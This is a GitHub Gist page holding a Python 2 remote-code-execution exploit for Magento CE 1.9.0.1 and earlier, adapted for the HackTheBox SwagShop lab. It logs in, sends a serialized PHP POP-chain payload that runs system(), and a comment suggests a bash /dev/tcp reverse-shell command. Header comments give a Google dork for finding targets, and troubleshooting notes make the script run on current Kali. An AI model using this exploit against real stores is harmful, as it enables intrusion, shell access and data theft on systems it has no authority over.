Forked from falcononrails/post_rce_revshell.py
Last active
December 27, 2023 15:20
-
-
Save zhsh9/6ae916c6467f23cf9cc880eabfcc3e2c to your computer and use it in GitHub Desktop.
Post Auth Magento RCE for reverse shell (HTB SwagShop)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE | |
# Google Dork: "Powered by Magento" | |
# Date: 08/18/2015 | |
# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com | |
# Vendor Homepage: http://magento.com/ | |
# Software Link: https://www.magentocommerce.com/download | |
# Version: 1.9.0.1 and below | |
# Tested on: Ubuntu 15, ubuntu 18.04 | |
# CVE : none | |
""" | |
Problem fixing: | |
(1) | |
Python2 package fixing in kali 2023: | |
```bash | |
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py | |
sudo python2 get-pip.py | |
sudo pip2 install mechanize | |
``` | |
(2) | |
mechanize._form_controls.AmbiguityError: more than one control matching name 'login[username]' | |
""" | |
from hashlib import md5 | |
import sys | |
import re | |
import base64 | |
import mechanize | |
def usage(): | |
print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"" | |
sys.exit() | |
if len(sys.argv) != 3: | |
usage() | |
# Command-line args | |
target = sys.argv[1] | |
arg = sys.argv[2] # rshell command like: bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1" | |
# Config. | |
username = 'forme' | |
password = 'forme' | |
php_function = 'system' # Note: we can only pass 1 argument to the function | |
install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml | |
# POP chain to pivot into call_user_exec | |
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \ | |
'\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \ | |
'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \ | |
'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \ | |
'_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \ | |
';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function, | |
len(arg), arg) | |
# Setup the mechanize browser and options | |
br = mechanize.Browser() | |
#br.set_proxies({"http": "localhost:8080"}) | |
br.set_handle_robots(False) | |
request = br.open(target) | |
br.select_form(nr=0) | |
br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control. | |
br.form.fixup() | |
""" | |
debug: mechanize._form_controls.AmbiguityError: more than one control matching name 'login[username]' | |
for control in br.form.controls: | |
if control.name == 'login[username]': | |
print(control) | |
<TextControl(login[username]=)> | |
<TextControl(login[username]=forme)> | |
so, choose the first control | |
""" | |
br.form.find_control(name="login[username]", nr=0).value = username # instead of br['login[username]'] = username | |
br['login[password]'] = password | |
br.method = "POST" | |
request = br.submit() | |
content = request.read() | |
url = re.search("ajaxBlockUrl = \'(.*)\'", content) | |
url = url.group(1) | |
key = re.search("var FORM_KEY = '(.*)'", content) | |
key = key.group(1) | |
request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key) | |
tunnel = re.search("src=\"(.*)\?ga=", request.read()) | |
tunnel = tunnel.group(1) | |
payload = base64.b64encode(payload) | |
gh = md5(payload + install_date).hexdigest() | |
exploit = tunnel + '?ga=' + payload + '&h=' + gh | |
try: | |
request = br.open(exploit) | |
except (mechanize.HTTPError, mechanize.URLError) as e: | |
print e.read() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment